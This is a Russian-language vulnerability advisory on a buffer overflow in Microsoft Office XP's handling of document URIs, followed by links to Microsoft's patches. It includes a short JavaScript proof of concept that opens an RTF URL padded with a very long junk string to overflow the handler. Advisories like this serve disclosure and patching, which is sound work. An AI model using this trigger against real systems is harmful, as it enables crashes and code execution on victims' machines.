Удаленное выполнение произвольного кода в Microsoft Office XP (обновлено)

Описание:
Уязвимость позволяет злоумышленнику выполнить произвольный код на уязвимой системе с привилегиями текущего пользователя.

Уязвимость обнаружена при обработке URI документа, содержащего символы ‘%00’ в Microsoft Office. Удаленный атакующий может вызвать переполнение буфер с помощью специально сформированного имени документа и выполнить произвольный код на уязвимой системе.

Пример/Эксплоит: См. источник сообщения. <Script>
var mylongstring,myjunk;
mylongstring ="";
myjunk="bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
bbbbbbbbbbbbbbbbbbb";
for(c=1;c<5000;c++)
{
mylongstring = mylongstring + myjunk;
}
window.open("http://www.hhs.gov/ocr/privacysummary.rtf%0a"+mylongstring);
< /script>

URL производителя: http://www.microsoft.com

Решение: Установите обновления

Microsoft Office XP Software (requires Service Pack 3):
http://www.microsoft.com/downloads/details.aspx?FamilyId=A0115BF8-5F80-43E9-BE28-24D344600D69

Microsoft Office XP Software (requires Service Pack 2):
http://www.microsoft.com/downloads/details.aspx?FamilyId=A0115BF8-5F80-43E9-BE28-24D344600D69

Microsoft Project 2002:
http://www.microsoft.com/downloads/details.aspx?FamilyId=9FB0B8CC-593A-4955-9AF1-84AD2664E3AC

Microsoft Visio 2002:
http://www.microsoft.com/downloads/details.aspx?FamilyId=07EB60C3-D38A-4130-BC44-6C8511ECADB9

Microsoft Works Suite 2002:
http://www.microsoft.com/downloads/details.aspx?FamilyId=A0115BF8-5F80-43E9-BE28-24D344600D69

Microsoft Works Suite 2003:
http://www.microsoft.com/downloads/details.aspx?FamilyId=A0115BF8-5F80-43E9-BE28-24D344600D69

Microsoft Works Suite 2004:
http://www.microsoft.com/downloads/details.aspx?FamilyId=A0115BF8-5F80-43E9-BE28-24D344600D69